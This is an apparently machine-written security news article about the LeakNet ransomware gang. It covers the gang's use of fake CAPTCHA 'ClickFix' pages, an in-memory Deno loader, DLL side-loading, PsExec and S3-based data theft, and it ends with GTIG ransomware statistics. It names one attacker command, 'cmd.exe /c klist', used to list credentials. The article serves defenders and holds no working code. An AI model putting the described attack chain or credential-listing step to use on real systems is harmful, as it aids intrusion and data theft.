Ethical Hacking News
LeakNet Ransomware Exploits ClickFix Social Engineering Tactics to Deploy Deno In-Memory Loader
The cybersecurity landscape is evolving with new threat actors emerging and innovative social engineering tactics like ClickFix being adopted by ransomware operations.LeakNet, a ransomware operation, has adopted the ClickFix technique as an initial access method, tricking users into running malicious commands through compromised websites.The use of ClickFix offers advantages to threat actors, including reduced dependence on third-party suppliers and lower per-victim acquisition cost.LeakNet's attack vector involves a Deno-based loader, DLL side-loading, PsExec, data exfiltration, and encryption, making it challenging for defenders to detect the malicious activity.The attackers also use S3 buckets for staging and exfiltration, reducing their detection footprint.The emergence of LeakNet highlights the need for organizations to stay vigilant and implement robust security measures against such attacks.
The cybersecurity landscape is constantly evolving, with new threat actors emerging and traditional methods of attack being replaced by innovative social engineering tactics. One such example is the recent adoption of the ClickFix social engineering technique by the ransomware operation known as LeakNet. This tactic, which has been gaining traction among threat actors in recent months, involves tricking users into manually running malicious commands to address non-existent errors delivered through compromised websites.
According to a recent report published by ReliaQuest, a cybersecurity company that specializes in threat intelligence, LeakNet has adopted the ClickFix technique as an initial access method. This is a significant departure from traditional methods of ransomware deployment, which often rely on stolen credentials or exploited vulnerabilities. Instead, LeakNet uses legitimate-but-compromised websites to serve fake CAPTCHA verification checks that instruct users to copy and paste a "msiexec.exe" command to the Windows Run dialog.
The use of ClickFix offers several advantages to threat actors, including reduced dependence on third-party suppliers, lower per-victim acquisition cost, and eliminated operational bottlenecks. Furthermore, this tactic is not confined to a specific industry vertical, but rather casts a wide net to infect as many victims as possible. This approach has already shown its effectiveness, with LeakNet reported to have targeted industrial entities and other organizations across various sectors.
In addition to the use of ClickFix, LeakNet also employs a Deno-based loader to execute Base64-encoded JavaScript directly in memory. This approach minimizes on-disk evidence and makes it more difficult for defenders to detect the malicious activity. The payload is designed to fingerprint the compromised system, contact an external server to fetch next-stage malware, and enter into a polling loop that repeatedly fetches and executes additional code through Deno.
The post-compromise activity of LeakNet follows a consistent methodology, which involves using DLL side-loading to launch a malicious DLL delivered via the loader. The attacker then uses PsExec to execute further malicious payloads, followed by data exfiltration and encryption. In some cases, LeakNet also runs cmd.exe /c klist, a built-in Windows command that displays active authentication credentials on the compromised system.
LeakNet's use of S3 buckets for staging and exfiltration is another notable aspect of its attack vector. By exploiting the appearance of normal cloud traffic, the attackers reduce their detection footprint and make it more challenging for defenders to identify and block the malicious activity.
The emergence of LeakNet as a major ransomware operation has significant implications for organizations across various sectors. With the increasing sophistication of threat actors and the adoption of innovative tactics like ClickFix, it is essential for companies to stay vigilant and implement robust security measures to protect themselves against such attacks.
According to Google's Threat Intelligence Group (GTIG), the top 10 ransomware brands with the most victims claimed on their data leak sites include Qilin (aka Agenda), Akira (aka RedBike), Cl0p, Play, SafePay, INC Ransom, Lynx, RansomHub, DragonForce (aka FireFlame and FuryStorm), and Sinobi. The group also reported that in a third of incidents, the initial access vector was confirmed or suspected exploitation of vulnerabilities, most often in common VPNs and firewalls.
Furthermore, Google's GTIG noted that 77% of analyzed ransomware intrusions included suspected data theft, an increase from 57% in 2024. Despite ongoing turmoil caused by actor conflicts and disruption, ransomware actors remain highly motivated and the extortion ecosystem demonstrates continued resilience. However, at least some threat actors are shifting their targeting calculus away from large companies to focus on higher volume attacks against smaller organizations.
In conclusion, the adoption of ClickFix social engineering tactics by LeakNet represents a significant shift in the way threat actors deploy ransomware operations. This tactic offers several advantages and is already showing its effectiveness in infecting numerous victims across various sectors. As such, it is essential for organizations to stay vigilant and implement robust security measures to protect themselves against such attacks.
Related Information:
https://www.ethicalhackingnews.com/articles/LeakNet-Ransomware-Exploits-ClickFix-Social-Engineering-Tactics-to-Deploy-Deno-In-Memory-Loader-ehn.shtml
https://thehackernews.com/2026/03/leaknet-ransomware-uses-clickfix-via.html
Published: Tue Mar 17 10:44:24 2026 by llama3.2 3B Q4_K_M
